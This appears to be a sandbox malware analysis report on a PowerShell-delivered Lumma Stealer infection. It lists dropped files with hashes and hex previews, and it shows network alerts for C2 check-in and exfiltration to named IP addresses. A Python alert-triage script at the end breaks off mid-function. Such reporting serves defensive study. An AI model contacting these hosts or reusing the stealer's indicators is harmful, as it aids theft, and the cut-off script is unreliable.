Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2010 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>WWAN Service Group Policy Settings</displayName>.. <description>WWAN Service Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="WwanSvc_Category">WWAN Service</string>.. <string id="NetworkCost_Category">WWAN Media Cost</string>.. <string id="SetCost3G">Set 3G Cost</string>.. <string id="SetCost3G_Help">This policy setting configures the cost of 3G connections on the local machine.....If this policy setting is enabled, a drop-down list box presenting possible cost values will be active. Selecting one of the following values from the list will set the cost of all 3G connections on the local machine:....

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):2704792
Entropy (8bit):6.725743776039723
Encrypted:false
SSDEEP:49152:ImBYJtMTl/GuTvOCnCaYXWRTDF8fLen6yfZ0rO43PSGgt2:9OC9YXeTDFWD5PZ
MD5:449BF7A46490FA07881D969B6D52C0F1
SHA1:E520A8318E867C7840E6DEADEF36ABCDF2894417
SHA-256:5883D041C5F5020AC4B66314D5F89CB6331DB3C4EC1C912F72B3EBB9AA8C41E2
SHA-512:EABAA33B037BA9F1EE874C534D85AD281985E85E1DD2C115A2693F56381A9A596F22B16938916FD34804A3D490CD0AC53A2969C5F73A923B163C5474FEA91B91
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....{.f.........." .....~ .........`........................................0s.......)...`A.........................................I'......O'.(.............q.......)..)....r..3..."'......................!'.(.... .@............R'.8............................text...u| ......~ ................. ..`.rdata...d.... ..f.... .............@..@.data.....I...(.."....'.............@....pdata........q.......(.............@..@.gxfg....,....r.......(.............@..@.retplne......r.......(..................tls..........r.......(.............@..._RDATA........r.......(.............@..@.reloc...3....r..4....(.............@..B................................................................................................................................................................................................................................................................

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):10717680
Entropy (8bit):6.282426578921538
Encrypted:false
SSDEEP:196608:WgPBhORiuQwCliXUxbblHa93Whli6Z26wO+:W8wkDliXUxbblHa93Whli6ZUF
MD5:74BDED81CE10A426DF54DA39CFA132FF
SHA1:EB26BCC7D24BE42BD8CFBDED53BD62D605989BBF
SHA-256:7BF96C193BEFBF23514401F8F6568076450ADE52DD1595B85E4DFCF3DE5F6FB9
SHA-512:BD7B7B52D31803B2D4B1FD8CB76481931ED8ABB98D779B893D3965231177BDD33386461E1A820B384712013904DA094E3CD15EE24A679DDC766132677A8BE54A
Malicious:false
Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html ......E.......E.......E..P/...E.../...E..P7...E...7...E...h...F...h.. F..Pi..0F......DF.....WF.....jF..P...}F.......F..`....F.......F.. ....F.......F..0....F.......G......G......(G.....;G..@...NG......aG.....tG.......G.......G..@....G.......G.......G.......G..P....G.......H.......H..P...2H......EH..`...UH......hH......yH..P....H.......H.......H..`....H.......H.......H..P....I.......I......-I..@...=I......PI......aI..@...uI.......I...0...I.. 1...I..p1...I...e...I...e...I...i...I..`i...J...i..)J...K..BJ..p...^J..."'.uJ..P.'..J....'..J...5'..J..06'..J...>'..J..P?'..K...D'..K...F'.0K...H'.IK...V'.hK....(..K....(..K..P.)..K....)..K..pW*..K..P.*..L...*+.?L..p.+.bL....+..L...U,..L....,..L....,..L....,..L..@.,..M....,.-M..P.-.IM.. e-.`M...e-.~M...R/..M.../..M..0.0..M..@.0..M..P.0..M....0..N....0.!N...,0.9N...,0.NN..0-0.fN...-0.vN...Y0..N...Z0..N..

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):613840
                                                                                                                                                                                                        Entropy (8bit):5.353969995543054
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:ti2Cr/XgXBS/YKiMpN5zzivVsTRlWxYZbAIf+jL/k5nnPo7p1KFqUg/J6:tZCr/BzOvrYs1KgJ6
                                                                                                                                                                                                        MD5:753BE41D649D31812067EC2B85C10F0E
                                                                                                                                                                                                        SHA1:769531CC83B6D5DD9ABFECFA4C2D0C4128BF42F2
                                                                                                                                                                                                        SHA-256:169FC7F80834ACF1D59B62C2ADBE6D1AD477CF2564EE84150DFFFD36CAA1CA33
                                                                                                                                                                                                        SHA-512:86D76228FD82B09529D15D35B9BD45F7E0EA7328EA984FF9E0414A05746B7853DDB2AC8537A1D46B59F4A13F471120C3A428DF28FB51FC9FACC51C5F9EF6D497
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:........O.'a.c>.7.5.288.23......................................................X...,>......p4......................P....B...B..P.......`....`....`....`....`t...`x...`V...`....`...... ....y.`H...D..X!}...X!A...X!A.D. ..Q.`H...D..X!m...X!E...X!E.D. ..`H...D..X!}...X!I...X!I.D. ....`H...D..X!}...X!M...X!M.D. ..i.`....D..X!q...X!Q...X!Q.D. ....`H...D..X!}...X!U...X!U.D. ..9.`H...D..X!}...X!Y...X!Y.D. ..`H...D..X!}...X!]...X!].D. ..`H...D..X!}...X!a...X!a.D. ....`H...D..X!u...X!e...X!e.D. ..`H...D..X!}...X!i...X!i.D.(Jb....!..... ..F`....^.Q...V`.....(Jb....1..... ..F`....^......@...IDa........D`....D`....D`.....`.....D]....D`.@.....V`......WIa...........V`......WIa...........WIa...........WIa...........WIa...........V`......WIa...........WIa...........WIa...........V`......WIa...........WIa...........WIa...........WIa............L`.....HD...D...D..Qb........3......D...L.........................................................................................................................
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):519944
                                                                                                                                                                                                        Entropy (8bit):6.065481336711818
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:rnXnae2TPlr3zvzar5oRDaw92wP6mai9gs6CU:78lrT+r5ADakP4i9gsc
                                                                                                                                                                                                        MD5:65839A5C28A0DEE380C4EBA54E2D941F
                                                                                                                                                                                                        SHA1:AC609EA7F86FE533820B801CFE40B22F8A7A3F1B
                                                                                                                                                                                                        SHA-256:C7A4C035D89716B027F69C2CC98EAF5C44FB15B08C2EA162D793466356A35A2A
                                                                                                                                                                                                        SHA-512:E6853FF5D10D11B5333F0697DCB660A042EBEAE12EEBC84427D0B9F896CF100258E7E6D18F531AAE700C0F476F91F11DA0272E7809728DF68DA80EE560136AEB
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s$............" ..0.................. ........... ....................... ...........@.................................@...O........................'..........h...T............................................ ............... ..H............text...h.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................t.......H.......,g..\P............................................................{<...*..{=...*V.(>.....}<.....}=...*...0..;........u(.....,/(?....{<....{<...o@...,.(A....{=....{=...oB...*.*. ... )UU.Z(?....{<...oC...X )UU.Z(A....{=...oD...X*.0...........r...p......%..{<..........+.....+...-.q+........+...-.&.+...+...oE....%..{=..........,.....,...-.q,........,...-.&.+...,...oE....(F...*r...(....(G.....}......}....*JrG..p.......(H...*2.,...s....z*..{....*N.,...i./...s......*N.,...i
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):30512
                                                                                                                                                                                                        Entropy (8bit):6.293166408242498
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:37VPSe+T3KkTRIjjzi3WbR1zQnSyGUvXU7Ex3dVOSRZYNyb8E9VF6IYinAM+oaua:37VPSFTamMRbzCfzZQEpYinAMxJH4
                                                                                                                                                                                                        MD5:F0739E1DB958FDE4DC6BAB9D75865191
                                                                                                                                                                                                        SHA1:FEDADBF79B594995E6C44108D6B25CDBBF05EB65
                                                                                                                                                                                                        SHA-256:27FAAC58C4EDC8FB147C9947FC9567AFD2F785B11252C2963788FD0F64F7CA42
                                                                                                                                                                                                        SHA-512:ADBF2A0B42C6043EE5C984C02FCC8815B143117FA2EE0286B048F9E90D695F74F0129240E1DE36DEA2915F1E3D31359953095E6E5497337D01F0004D443AAD10
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!..0..F...........e... ........... ...............................3....`.................................He..O....................P..0'...........d............................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............N..............@..B................|e......H........3...1...........................................................0..H..........(*...(.......,.*........s..... .... .:..s....}............s....(%...*V.#......>@(....o3...*...0..=........(+...r...po......o2....(+...r3..po......&.(+...rw..po......*...........)).......*...0..@........(6....{....%-.&+. .... .:..(....&..}........(+...r...p.o......*........++.......0..7........{....,..{....o......}.....(8.......(+...r...p.o......*.........""......v.{......o....&.{....,..o...
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3136432
                                                                                                                                                                                                        Entropy (8bit):5.953248030549441
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:49152:KQ96YdG5LJ3Z3k0jbdHMsChIiv1o/spNM:FqBkMGsCJe
                                                                                                                                                                                                        MD5:CF83372CE8462708F58817B1560E7006
                                                                                                                                                                                                        SHA1:6484FDC351661E0EC40FF6D8EF2D9C1DF2B05F1A
                                                                                                                                                                                                        SHA-256:37A5A53B7D95439B05B5E4F394DE8B931A500F6DF97AAF1A82CB8A66C11478F2
                                                                                                                                                                                                        SHA-512:D4D24CFE4819343A98D2C83F62B456E922FF88215015D6A76D230D4034B68AFBEF45E3FAD2B92B6D2DBFC2772B65C0BB91545B61BD0231C8A75C03A4146352D6
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........h.......z.........@..............................0.......0...`.........................................>9#......9#.d.....)..l...@(.....HF/.h....P0..&....#.8.....................#.(...@...8............A#......*#......................text............................... ..`.rdata.../.......0..................@..@.data....<....$.......#.............@....pdata.......@(......~'.............@..@.gxfg....3... )..4...X(.............@..@.retplne.....`).......(..................tls....1....p).......(.............@....voltbl.D.....).......(.................CPADinfo8.....).......(.............@...LZMADEC.......).......(............. ..`_RDATA........).......(.............@..@malloc_h......).......(............. ..`.rsrc....l....)..n....(.............@..@.reloc...&...P0..(..../.............@..B........................................................
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):29152
                                                                                                                                                                                                        Entropy (8bit):6.656857622778623
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:+yq82Ud7/zfkn8I+ilpd4TILqIgXYoBCH/3hprl:Zq824LfMV4TqqIgXYoBCH/3hpB
                                                                                                                                                                                                        MD5:B6F6C3C38568EE26F1AC70411A822405
                                                                                                                                                                                                        SHA1:5B94D0ADAC4DF2D7179C378750C4E3417231125F
                                                                                                                                                                                                        SHA-256:A73454C7FAD23A80A3F6540AFDB64FC334980A11402569F1986AA39995AE496D
                                                                                                                                                                                                        SHA-512:5C0A5E9A623A942AFF9D58D6E7A23B7D2BBA6A4155824AA8BB94DBD069A8C15C00DF48F12224622EFCD5042B6847C8FB476C43390E9E576C42EFC22E3C02A122
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=...=...=....`.?...#.e.?...#.c.<...#.r.?.......8...=...f...#.u.$...#.b.<...#.g.<...Rich=...................PE..L......I................."...(......a,.......@....@..................................u......................................lB..P....p..@............N...#...........................................A..@............@..x............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data........P.......0..............@....rsrc...@....p.......<..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):65856
                                                                                                                                                                                                        Entropy (8bit):6.253138341040912
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:DyvHa8En7WFlzobIrmKD8owRaggg5TIcO3YDmj7Hx4:DyvHa8EnKFqKD8aK0jj6
                                                                                                                                                                                                        MD5:760F24F0150A6E8DC15AC793C3172387
                                                                                                                                                                                                        SHA1:920D5AAFB4B460EFC37B99564BD281E63C7EB647
                                                                                                                                                                                                        SHA-256:E113F8593244C1BB5BCC73FEF0F93303C783714162CBD9EF93DDFF5709C037CE
                                                                                                                                                                                                        SHA-512:E5251075164F9CDB154B0B5BF7B775C9720B0744D004B68CE6501A980342F45398505BC26F7CCA982BD23A03609B3C78510A5778A93041E7614E17B369A7209F
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. .......................@.......p....@.................................t...J.......................@'... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......l....`..............`...........................................V. 0u..}........(....*.."..(....*...6..(....(....*...0..;.......s......s.......(.......,..o......o........,..o.......(....*.....................#).......0..;.......s......s.......(.......,..o......o........,..o.......(....*.....................#).......0..;.......s......s.......o.......,..o......o........,..o.......(....*.....................#).......0..B.......s......s.......o......o.......,..o......o...
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Category:dropped
Size (bytes):146752
Entropy (8bit):6.209702529084155
Encrypted:false
SSDEEP:3072:8zWwFkpFMOKq9hC3ZWU+Oq1hZ+fVztxQ0rzc0to734o:s/zq9huqrZ+dbQIz1o
MD5:985F25C1D3144F37F046BC8F3E2B0C83
SHA1:C0B551C51317891D8220AB5A634C15ACF8223E88
SHA-256:3F71FA4C64376E85486B22DE926F61C3E3CDE3DE6C1D484E041F265534CCD623
SHA-512:B0DB2C878948922243CC80AB015A954B11C5E08FCE7DBE767722BC5082B150F277690ACF9DA1C657837E7A66059CAFA7BA76C3695BBA51B44467979F5A9C053B
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):373656
Entropy (8bit):5.747099794440249
Encrypted:false
SSDEEP:3072:rbT9vTZFNSlIbVf7o3Cyi7igb/Js0S6uZZspiDbZHNjWOnNxFiKey1ISQlXflY:fRvNvvbhOq7F3S/qpiDlNCONvmXdY
MD5:14934CACA84D5FE0288F27EFB31DCBF8
SHA1:98C8C659488A5782679112E0FFB089422A664AC5
SHA-256:7FA86147035627BAE39576BCBE619D045E94A48C4DB8CA131968C20BB4DE4A36
SHA-512:9A239132A46FE578FA04FF727D8C28F9E1D179E7154619670A22A403819F337AF0A96EBD7081D04D53910A12BBDC548B3CD2B2A285931C92F1C149AD5D846A6A
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):653952
Entropy (8bit):6.885961951552677
Encrypted:false
SSDEEP:12288:5hr4UC+Ju/A0BI4yWkoGKJwZ9axKmhYTMAO7wFKjCUmRyyPe:9JfyZFGKJjxKmhSMAB6CUmRyyPe
MD5:11D49148A302DE4104DED6A92B78B0ED
SHA1:FD58A091B39ED52611ADE20A782EF58AC33012AF
SHA-256:CEB0947D898BC2A55A50F092F5ED3F7BE64AC1CD4661022EEFD3EDD4029213B0
SHA-512:FDC43B3EE38F7BEB2375C953A29DB8BCF66B73B78CCC04B147E26108F3B650C0A431B276853BB8E08167D34A8CC9C6B7918DAEF9EBC0A4833B1534C5AFAC75E4
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):14191200
Entropy (8bit):7.9262695020755505
Encrypted:false
SSDEEP:393216:W1pU8xeUOhMFCBURDP4RSLkcswLqLibwonZ14tb:Wr7rCBURqcTXconZ1Ab
MD5:77B8F54C99903633175BF2EE83B93089
SHA1:F8A7C2D280464EA887F95295670D1A3C78146519
SHA-256:09F7868EB0D7629399F54934AE930314358845C9929D973B05F6C1CCA7C67A9E
SHA-512:54D618060571517317F5A6020D79A0E693D499AC865C2A031B5F7AFCCE0EBF75F3610C42F807FEA0FC0B7852F0B119EABE80E317EC7CB181B90B90C202A09BBB
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 8%
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):9926
Entropy (8bit):6.601683018009094
Encrypted:false
SSDEEP:192:bcCThv4kMUxkMSwJZ8JewGJ6PlKeVsXmWl97ZHaaRbdn2OYvFDE84BRP:vThvYMSwJZ+GJ6PMtWWX16ab29Kb
MD5:0780B1687F4B818A6CCA3CAF57B0D062
SHA1:49B0E39A452F956F640F185CF396D31E8E8E8A39
SHA-256:9E7AEA9FBA017E367B8FD3B188F6AFEF0197F89036FA35420729F19048C6FF2D
SHA-512:8B002C586B73D4AF5A5DAAE512C2B096C4A061BC69AD3750C930D6429FA75C947BD7305A25A9378BEE236C1028914E91B9111A7D735B9D029E2FE7063562CB00
Malicious:false
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):986746
Entropy (8bit):7.867918664785953
Encrypted:false
SSDEEP:24576:bfMR7mqnsKaQ+RFiZhbvisb4E5aJZNFCPxmO8al:YR7mqn+RFATiF9NFCpms
MD5:CF297F837262C0FBD5AD028C39A53B62
SHA1:B6B54C0476C1F4168B829A9A475888BAF3B14012
SHA-256:4CBDB194C720BC44A5B234FAAA03925EE9566DE6D814D9124DFA6767B41E03CB
SHA-512:283D2B15A5F317910A5EB5BB74604894E3F36DD907254D98F26C2130A770B552DE6631AFD2D820DE0A9EA069643F19BC86884D719C0F8DFA4B1394FF7880D10B
Malicious:false
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6221
Entropy (8bit):3.7378750327179513
Encrypted:false
SSDEEP:96:f/e33CxH29kkvhkvCCtF9LTJjUHngLTJjUHnC:f/eyWKHLpLB
MD5:48AD97CBBAA9486A3BF86A661352D270
SHA1:E0F838D9AC65C3FE8A044DBE999AF98DB0BF5AA7
SHA-256:4C3B80211EC5464DB5999F7F440F3C2537A4B154188EC14D2E362B51272CB924
SHA-512:9350259EFC1569D16C95A6630DAA536F31FA47ED5DEA34176960D9CC7FA3C04D64B9D23F2CF596B1A06729187EF23924C7FD9D311BBE5197AD72D9CCB1201622
Malicious:false
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):6221
Entropy (8bit):3.7378750327179513
Encrypted:false
SSDEEP:96:f/e33CxH29kkvhkvCCtF9LTJjUHngLTJjUHnC:f/eyWKHLpLB
MD5:48AD97CBBAA9486A3BF86A661352D270
SHA1:E0F838D9AC65C3FE8A044DBE999AF98DB0BF5AA7
SHA-256:4C3B80211EC5464DB5999F7F440F3C2537A4B154188EC14D2E362B51272CB924
SHA-512:9350259EFC1569D16C95A6630DAA536F31FA47ED5DEA34176960D9CC7FA3C04D64B9D23F2CF596B1A06729187EF23924C7FD9D311BBE5197AD72D9CCB1201622
Malicious:false
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=deflate
Category: dropped
Size (bytes): 26901385
Entropy (8bit): 7.998829610207703
Encrypted: true
SSDEEP: 786432:p3iBqL0gkrPWCd+qT7ubG1T6wJpRIMWo2:p3iBqIgW1/v4GB33co2
MD5: EC9A1F58F7AACE01D209AADB3C0254FF
SHA1: 7E1706C415E58142E9F1EBE5C90466D8EF3F878F
SHA-256: B63C17FD0F3122BDF59A2C444D54D54ECD1A866B5A4581F237043E541C1AABB8
SHA-512: 027C1011AF4E2685920E95F53063F56673BA370305DD2B9D764023F4A277FF2D90721A8016693D3121AA143FC4E3EAC9553BFE43329454A79A074B0A383AB7AA
Malicious: false
                                                                                                                                                                                                        Preview:PK.........6zY^0.t(x..`.......python27.dll..g\.O.6./$.. .Pi...$.Q..........w.@.B.(.......H/. ....P.(.h..P.@.Y..i.s.{.....r......3.\...s... 2..q.*....@....7|B.p(..@.Uk..u......l.~.....w...n...v.v.1.,..g.f.a.L..G.!~...3..d^].......@.....[..k......+.p.?.>...;..K..a=.e..g..|. " .......U_.....8....{..=0.?...Fh......A...u.......:...%.G..#.@.K..../~...<.oZ.....1.....?..}}<....].^......p..%...V.!.1....D8O.f.../.!..u|T.6.....4......`.F.~`._ZC.@F5........= .4....6.O.|.............z.....d..[...~..'..nA....?..s.&.E.. ........D1"W...P.5Ml...2D#...I.. 8_nI.........d$.V.8*.ep..P &f.1..wb.M..$.6!fBZ.N4....jL.D.g.p.._.J.S.m.c.K}.#m......0.>...(.`.'PQJ....7<+.....W.~..X.....`.1U.R..,....A.nt...z.%c.0n..P..>.....%.g....P....ybn..>/..Bp!M)kO.*...m..K!..av.Gq%....%.?.r.#H...........Z.jh.0..3*4].5.nO.6q/Z.k?....UP+tB.L&.z.y.R.....z3.b9.%...E.<A".\.C...i...*..9..!-... .?......p.. .....`9d=....%...:.....a.....TS.;Z..;.k.-...K.ra...nY.....%.....7.w
File type: ASCII text, with very long lines (65265), with CRLF line terminators
Entropy (8bit): 5.999389941414555
TrID:
  File name: bUAmCazc.ps1
  File size: 35'869'954 bytes
  MD5: fa478f449dec7d97732bf290fd92b7bc
  SHA1: c08ed5100f487fe29245af63c388ead0b0e7b461
  SHA256: b352201272b66562cea2dda2ec8b6aa1a5b0718f794c9f7c75c74cbdce4e6d1b
  SHA512: 4ef01f2283e8149f0cadd8e4532bab827b496d0eef1742056b389cf791247d0d19b171247b197d1743e86a5c6371b58d4f1016e6fbeefdf57b0e006b5cb4b7cb
  SSDEEP: 49152:9Eke/hcd2zrXvgPQxp0esnK1o75AsocLIfx/TMuQ2oSVz+yI55vQdNO9YDByooBC:a
  TLSH: 357733305E6A7DBA076CD23D307F6F1D1FA00F96804CE6DA53E464C716AEB90865BC29
  File Content Preview: .. $DjXtrvmw = "Stop".. Set-Location $Env:AppData.. $hPZFucyy = "$Env:AppData\FeGIPCnK".. if (Test-Path $hPZFucyy) {.. if (Test-Path "$Env:AppData\huhrUxLh.txt") {.. Remove-Item "$Env:AppData\huhrUxLh.txt".. }..
  Icon Hash: 3270d6baae77db44
Timestamp                        SID      Signature                                                  Severity  Source IP    Source Port  Dest IP        Dest Port  Protocol
2024-11-29T15:45:51.132831+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49736        172.67.170.85  443        TCP
2024-11-29T15:45:54.094934+0100  2049836  ET MALWARE Lumma Stealer Related Activity                  1         192.168.2.4  49736        172.67.170.85  443        TCP
2024-11-29T15:45:54.094934+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                  1         192.168.2.4  49736        172.67.170.85  443        TCP
2024-11-29T15:45:55.504840+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49737        172.67.170.85  443        TCP
2024-11-29T15:45:58.553704+0100  2049812  ET MALWARE Lumma Stealer Related Activity M2               1         192.168.2.4  49737        172.67.170.85  443        TCP
2024-11-29T15:45:58.553704+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                  1         192.168.2.4  49737        172.67.170.85  443        TCP
2024-11-29T15:46:00.312055+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49739        172.67.170.85  443        TCP
2024-11-29T15:46:04.505532+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49747        172.67.170.85  443        TCP
2024-11-29T15:46:09.082469+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49758        172.67.170.85  443        TCP
2024-11-29T15:46:13.869083+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49771        172.67.170.85  443        TCP
2024-11-29T15:46:16.481366+0100  2048094  ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration      1         192.168.2.4  49771        172.67.170.85  443        TCP
2024-11-29T15:46:18.572183+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49783        172.67.170.85  443        TCP
2024-11-29T15:46:24.527434+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49795        172.67.170.85  443        TCP
2024-11-29T15:46:27.314353+0100  2054653  ET MALWARE Lumma Stealer CnC Host Checkin                  1         192.168.2.4  49795        172.67.170.85  443        TCP
2024-11-29T15:46:29.110776+0100  2028371  ET JA3 Hash - Possible Malware - Fake Firefox Font Update  3         192.168.2.4  49806        104.26.2.16    443        TCP
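The alert table above mixes one low-confidence rule (the JA3 fingerprint match, severity 3) with family-specific "ET MALWARE" rules (severity 1) on the same connections. An analyst triaging it wants the alerts regrouped per TCP flow so that a flow with only the JA3 hit (the last one, to 104.26.2.16) is separated from flows where a Lumma C2 check-in or exfiltration rule also fired. The following script is an added example and not part of the Joe Sandbox report: the rows are copied from the table, while the grouping, the "confirmed" versus "ja3-only" verdict and the use of the "ET MALWARE" rule-name prefix as the strong signal are this example's own assumptions about how to read the data.

```python
"""Regroup a sandbox report's Suricata alert rows into per-flow verdicts.

Added example, not part of the Joe Sandbox report. The rows below are copied
from the report's alert table; the verdict logic is an analyst's assumption.
"""
from collections import defaultdict
from dataclasses import dataclass

# Constructed from the report's alert table (a representative subset):
# (timestamp, sid, signature, severity, src_ip, src_port, dst_ip, dst_port, proto)
ALERT_ROWS = [
    ("2024-11-29T15:45:51.132831+0100", 2028371, "ET JA3 Hash - Possible Malware - Fake Firefox Font Update", 3, "192.168.2.4", 49736, "172.67.170.85", 443, "TCP"),
    ("2024-11-29T15:45:54.094934+0100", 2049836, "ET MALWARE Lumma Stealer Related Activity", 1, "192.168.2.4", 49736, "172.67.170.85", 443, "TCP"),
    ("2024-11-29T15:45:54.094934+0100", 2054653, "ET MALWARE Lumma Stealer CnC Host Checkin", 1, "192.168.2.4", 49736, "172.67.170.85", 443, "TCP"),
    ("2024-11-29T15:46:13.869083+0100", 2028371, "ET JA3 Hash - Possible Malware - Fake Firefox Font Update", 3, "192.168.2.4", 49771, "172.67.170.85", 443, "TCP"),
    ("2024-11-29T15:46:16.481366+0100", 2048094, "ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration", 1, "192.168.2.4", 49771, "172.67.170.85", 443, "TCP"),
    ("2024-11-29T15:46:29.110776+0100", 2028371, "ET JA3 Hash - Possible Malware - Fake Firefox Font Update", 3, "192.168.2.4", 49806, "104.26.2.16", 443, "TCP"),
]

JA3_HINT_SID = 2028371          # TLS client fingerprint only: weak evidence on its own
MALWARE_PREFIX = "ET MALWARE"   # assumption: family/behaviour rules carry this prefix


@dataclass(frozen=True)
class Flow:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


def group_by_flow(rows):
    """Return {Flow: [(timestamp, sid, signature, severity), ...]}, each list in time order."""
    flows = defaultdict(list)
    for ts, sid, sig, sev, sip, sport, dip, dport, _proto in rows:
        flows[Flow(sip, sport, dip, dport)].append((ts, sid, sig, sev))
    for hits in flows.values():
        # ISO-8601 timestamps with a fixed offset sort correctly as strings;
        # sort() is stable, so alerts sharing a timestamp keep their report order.
        hits.sort(key=lambda h: h[0])
    return dict(flows)


def flow_verdict(hits):
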